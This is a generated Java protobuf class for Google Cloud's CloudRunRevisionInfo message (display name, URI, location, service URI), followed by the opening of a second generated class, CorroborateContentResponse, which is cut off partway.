/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/networkmanagement/v1beta1/trace.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.networkmanagement.v1beta1; /** * * * <pre> * For display only. Metadata associated with a Cloud Run revision. * </pre> * * Protobuf type {@code google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo} */ public final class CloudRunRevisionInfo extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo) CloudRunRevisionInfoOrBuilder { private static final long serialVersionUID = 0L; // Use CloudRunRevisionInfo.newBuilder() to construct. private CloudRunRevisionInfo(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private CloudRunRevisionInfo() { displayName_ = ""; uri_ = ""; location_ = ""; serviceUri_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new CloudRunRevisionInfo(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.networkmanagement.v1beta1.TraceProto .internal_static_google_cloud_networkmanagement_v1beta1_CloudRunRevisionInfo_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.networkmanagement.v1beta1.TraceProto .internal_static_google_cloud_networkmanagement_v1beta1_CloudRunRevisionInfo_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo.class, com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo.Builder.class); } public static final int DISPLAY_NAME_FIELD_NUMBER = 1; @SuppressWarnings("serial") private volatile java.lang.Object displayName_ = ""; /** * * * <pre> * Name of a Cloud Run revision. * </pre> * * <code>string display_name = 1;</code> * * @return The displayName. */ @java.lang.Override public java.lang.String getDisplayName() { java.lang.Object ref = displayName_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); displayName_ = s; return s; } } /** * * * <pre> * Name of a Cloud Run revision. * </pre> * * <code>string display_name = 1;</code> * * @return The bytes for displayName. */ @java.lang.Override public com.google.protobuf.ByteString getDisplayNameBytes() { java.lang.Object ref = displayName_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); displayName_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int URI_FIELD_NUMBER = 2; @SuppressWarnings("serial") private volatile java.lang.Object uri_ = ""; /** * * * <pre> * URI of a Cloud Run revision. * </pre> * * <code>string uri = 2;</code> * * @return The uri. */ @java.lang.Override public java.lang.String getUri() { java.lang.Object ref = uri_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); uri_ = s; return s; } } /** * * * <pre> * URI of a Cloud Run revision. * </pre> * * <code>string uri = 2;</code> * * @return The bytes for uri. */ @java.lang.Override public com.google.protobuf.ByteString getUriBytes() { java.lang.Object ref = uri_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); uri_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int LOCATION_FIELD_NUMBER = 4; @SuppressWarnings("serial") private volatile java.lang.Object location_ = ""; /** * * * <pre> * Location in which this revision is deployed. * </pre> * * <code>string location = 4;</code> * * @return The location. */ @java.lang.Override public java.lang.String getLocation() { java.lang.Object ref = location_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); location_ = s; return s; } } /** * * * <pre> * Location in which this revision is deployed. * </pre> * * <code>string location = 4;</code> * * @return The bytes for location. */ @java.lang.Override public com.google.protobuf.ByteString getLocationBytes() { java.lang.Object ref = location_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); location_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int SERVICE_URI_FIELD_NUMBER = 5; @SuppressWarnings("serial") private volatile java.lang.Object serviceUri_ = ""; /** * * * <pre> * URI of Cloud Run service this revision belongs to. * </pre> * * <code>string service_uri = 5;</code> * * @return The serviceUri. */ @java.lang.Override public java.lang.String getServiceUri() { java.lang.Object ref = serviceUri_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); serviceUri_ = s; return s; } } /** * * * <pre> * URI of Cloud Run service this revision belongs to. * </pre> * * <code>string service_uri = 5;</code> * * @return The bytes for serviceUri. */ @java.lang.Override public com.google.protobuf.ByteString getServiceUriBytes() { java.lang.Object ref = serviceUri_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); serviceUri_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(displayName_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 1, displayName_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(uri_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, uri_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(location_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 4, location_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(serviceUri_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 5, serviceUri_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(displayName_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, displayName_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(uri_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, uri_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(location_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(4, location_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(serviceUri_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(5, serviceUri_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo)) { return super.equals(obj); } com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo other = (com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo) obj; if (!getDisplayName().equals(other.getDisplayName())) return false; if (!getUri().equals(other.getUri())) return false; if (!getLocation().equals(other.getLocation())) return false; if (!getServiceUri().equals(other.getServiceUri())) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + DISPLAY_NAME_FIELD_NUMBER; hash = (53 * hash) + getDisplayName().hashCode(); hash = (37 * hash) + URI_FIELD_NUMBER; hash = (53 * hash) + getUri().hashCode(); hash = (37 * hash) + LOCATION_FIELD_NUMBER; hash = (53 * hash) + getLocation().hashCode(); hash = (37 * hash) + SERVICE_URI_FIELD_NUMBER; hash = (53 * hash) + getServiceUri().hashCode(); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo parseFrom( byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * For display only. Metadata associated with a Cloud Run revision. * </pre> * * Protobuf type {@code google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo) com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfoOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.networkmanagement.v1beta1.TraceProto .internal_static_google_cloud_networkmanagement_v1beta1_CloudRunRevisionInfo_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.networkmanagement.v1beta1.TraceProto .internal_static_google_cloud_networkmanagement_v1beta1_CloudRunRevisionInfo_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo.class, com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo.Builder.class); } // Construct using com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; displayName_ = ""; uri_ = ""; location_ = ""; serviceUri_ = ""; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.networkmanagement.v1beta1.TraceProto .internal_static_google_cloud_networkmanagement_v1beta1_CloudRunRevisionInfo_descriptor; } @java.lang.Override public com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo getDefaultInstanceForType() { return com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo.getDefaultInstance(); } @java.lang.Override public com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo build() { com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo buildPartial() { com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo result = new com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0( com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.displayName_ = displayName_; } if (((from_bitField0_ & 0x00000002) != 0)) { result.uri_ = uri_; } if (((from_bitField0_ & 0x00000004) != 0)) { result.location_ = location_; } if (((from_bitField0_ & 0x00000008) != 0)) { result.serviceUri_ = serviceUri_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo) { return mergeFrom((com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom( com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo other) { if (other == com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo.getDefaultInstance()) return this; if (!other.getDisplayName().isEmpty()) { displayName_ = other.displayName_; bitField0_ |= 0x00000001; onChanged(); } if (!other.getUri().isEmpty()) { uri_ = other.uri_; bitField0_ |= 0x00000002; onChanged(); } if (!other.getLocation().isEmpty()) { location_ = other.location_; bitField0_ |= 0x00000004; onChanged(); } if (!other.getServiceUri().isEmpty()) { serviceUri_ = other.serviceUri_; bitField0_ |= 0x00000008; onChanged(); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { displayName_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000001; break; } // case 10 case 18: { uri_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000002; break; } // case 18 case 34: { location_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000004; break; } // case 34 case 42: { serviceUri_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000008; break; } // case 42 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.lang.Object displayName_ = ""; /** * * * <pre> * Name of a Cloud Run revision. * </pre> * * <code>string display_name = 1;</code> * * @return The displayName. */ public java.lang.String getDisplayName() { java.lang.Object ref = displayName_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); displayName_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Name of a Cloud Run revision. * </pre> * * <code>string display_name = 1;</code> * * @return The bytes for displayName. */ public com.google.protobuf.ByteString getDisplayNameBytes() { java.lang.Object ref = displayName_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); displayName_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Name of a Cloud Run revision. * </pre> * * <code>string display_name = 1;</code> * * @param value The displayName to set. * @return This builder for chaining. */ public Builder setDisplayName(java.lang.String value) { if (value == null) { throw new NullPointerException(); } displayName_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Name of a Cloud Run revision. * </pre> * * <code>string display_name = 1;</code> * * @return This builder for chaining. */ public Builder clearDisplayName() { displayName_ = getDefaultInstance().getDisplayName(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); return this; } /** * * * <pre> * Name of a Cloud Run revision. * </pre> * * <code>string display_name = 1;</code> * * @param value The bytes for displayName to set. * @return This builder for chaining. */ public Builder setDisplayNameBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); displayName_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } private java.lang.Object uri_ = ""; /** * * * <pre> * URI of a Cloud Run revision. * </pre> * * <code>string uri = 2;</code> * * @return The uri. */ public java.lang.String getUri() { java.lang.Object ref = uri_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); uri_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * URI of a Cloud Run revision. * </pre> * * <code>string uri = 2;</code> * * @return The bytes for uri. */ public com.google.protobuf.ByteString getUriBytes() { java.lang.Object ref = uri_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); uri_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * URI of a Cloud Run revision. * </pre> * * <code>string uri = 2;</code> * * @param value The uri to set. * @return This builder for chaining. */ public Builder setUri(java.lang.String value) { if (value == null) { throw new NullPointerException(); } uri_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * URI of a Cloud Run revision. * </pre> * * <code>string uri = 2;</code> * * @return This builder for chaining. */ public Builder clearUri() { uri_ = getDefaultInstance().getUri(); bitField0_ = (bitField0_ & ~0x00000002); onChanged(); return this; } /** * * * <pre> * URI of a Cloud Run revision. * </pre> * * <code>string uri = 2;</code> * * @param value The bytes for uri to set. * @return This builder for chaining. */ public Builder setUriBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); uri_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } private java.lang.Object location_ = ""; /** * * * <pre> * Location in which this revision is deployed. * </pre> * * <code>string location = 4;</code> * * @return The location. */ public java.lang.String getLocation() { java.lang.Object ref = location_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); location_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Location in which this revision is deployed. * </pre> * * <code>string location = 4;</code> * * @return The bytes for location. */ public com.google.protobuf.ByteString getLocationBytes() { java.lang.Object ref = location_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); location_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Location in which this revision is deployed. * </pre> * * <code>string location = 4;</code> * * @param value The location to set. * @return This builder for chaining. */ public Builder setLocation(java.lang.String value) { if (value == null) { throw new NullPointerException(); } location_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } /** * * * <pre> * Location in which this revision is deployed. * </pre> * * <code>string location = 4;</code> * * @return This builder for chaining. */ public Builder clearLocation() { location_ = getDefaultInstance().getLocation(); bitField0_ = (bitField0_ & ~0x00000004); onChanged(); return this; } /** * * * <pre> * Location in which this revision is deployed. * </pre> * * <code>string location = 4;</code> * * @param value The bytes for location to set. * @return This builder for chaining. */ public Builder setLocationBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); location_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } private java.lang.Object serviceUri_ = ""; /** * * * <pre> * URI of Cloud Run service this revision belongs to. * </pre> * * <code>string service_uri = 5;</code> * * @return The serviceUri. */ public java.lang.String getServiceUri() { java.lang.Object ref = serviceUri_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); serviceUri_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * URI of Cloud Run service this revision belongs to. * </pre> * * <code>string service_uri = 5;</code> * * @return The bytes for serviceUri. */ public com.google.protobuf.ByteString getServiceUriBytes() { java.lang.Object ref = serviceUri_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); serviceUri_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * URI of Cloud Run service this revision belongs to. * </pre> * * <code>string service_uri = 5;</code> * * @param value The serviceUri to set. * @return This builder for chaining. */ public Builder setServiceUri(java.lang.String value) { if (value == null) { throw new NullPointerException(); } serviceUri_ = value; bitField0_ |= 0x00000008; onChanged(); return this; } /** * * * <pre> * URI of Cloud Run service this revision belongs to. * </pre> * * <code>string service_uri = 5;</code> * * @return This builder for chaining. */ public Builder clearServiceUri() { serviceUri_ = getDefaultInstance().getServiceUri(); bitField0_ = (bitField0_ & ~0x00000008); onChanged(); return this; } /** * * * <pre> * URI of Cloud Run service this revision belongs to. * </pre> * * <code>string service_uri = 5;</code> * * @param value The bytes for serviceUri to set. * @return This builder for chaining. */ public Builder setServiceUriBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); serviceUri_ = value; bitField0_ |= 0x00000008; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo) } // @@protoc_insertion_point(class_scope:google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo) private static final com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo(); } public static com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<CloudRunRevisionInfo> PARSER = new com.google.protobuf.AbstractParser<CloudRunRevisionInfo>() { @java.lang.Override public CloudRunRevisionInfo parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<CloudRunRevisionInfo> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<CloudRunRevisionInfo> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleapis/google-cloud-java
35,826
java-aiplatform/proto-google-cloud-aiplatform-v1beta1/src/main/java/com/google/cloud/aiplatform/v1beta1/CorroborateContentResponse.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/aiplatform/v1beta1/vertex_rag_service.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.aiplatform.v1beta1; /** * * * <pre> * Response message for CorroborateContent. * </pre> * * Protobuf type {@code google.cloud.aiplatform.v1beta1.CorroborateContentResponse} */ public final class CorroborateContentResponse extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.aiplatform.v1beta1.CorroborateContentResponse) CorroborateContentResponseOrBuilder { private static final long serialVersionUID = 0L; // Use CorroborateContentResponse.newBuilder() to construct. private CorroborateContentResponse(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private CorroborateContentResponse() { claims_ = java.util.Collections.emptyList(); } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new CorroborateContentResponse(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.aiplatform.v1beta1.VertexRagServiceProto .internal_static_google_cloud_aiplatform_v1beta1_CorroborateContentResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.aiplatform.v1beta1.VertexRagServiceProto .internal_static_google_cloud_aiplatform_v1beta1_CorroborateContentResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse.class, com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse.Builder.class); } private int bitField0_; public static final int CORROBORATION_SCORE_FIELD_NUMBER = 1; private float corroborationScore_ = 0F; /** * * * <pre> * Confidence score of corroborating content. Value is [0,1] with 1 is the * most confidence. * </pre> * * <code>optional float corroboration_score = 1;</code> * * @return Whether the corroborationScore field is set. */ @java.lang.Override public boolean hasCorroborationScore() { return ((bitField0_ & 0x00000001) != 0); } /** * * * <pre> * Confidence score of corroborating content. Value is [0,1] with 1 is the * most confidence. * </pre> * * <code>optional float corroboration_score = 1;</code> * * @return The corroborationScore. */ @java.lang.Override public float getCorroborationScore() { return corroborationScore_; } public static final int CLAIMS_FIELD_NUMBER = 2; @SuppressWarnings("serial") private java.util.List<com.google.cloud.aiplatform.v1beta1.Claim> claims_; /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ @java.lang.Override public java.util.List<com.google.cloud.aiplatform.v1beta1.Claim> getClaimsList() { return claims_; } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ @java.lang.Override public java.util.List<? extends com.google.cloud.aiplatform.v1beta1.ClaimOrBuilder> getClaimsOrBuilderList() { return claims_; } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ @java.lang.Override public int getClaimsCount() { return claims_.size(); } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ @java.lang.Override public com.google.cloud.aiplatform.v1beta1.Claim getClaims(int index) { return claims_.get(index); } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ @java.lang.Override public com.google.cloud.aiplatform.v1beta1.ClaimOrBuilder 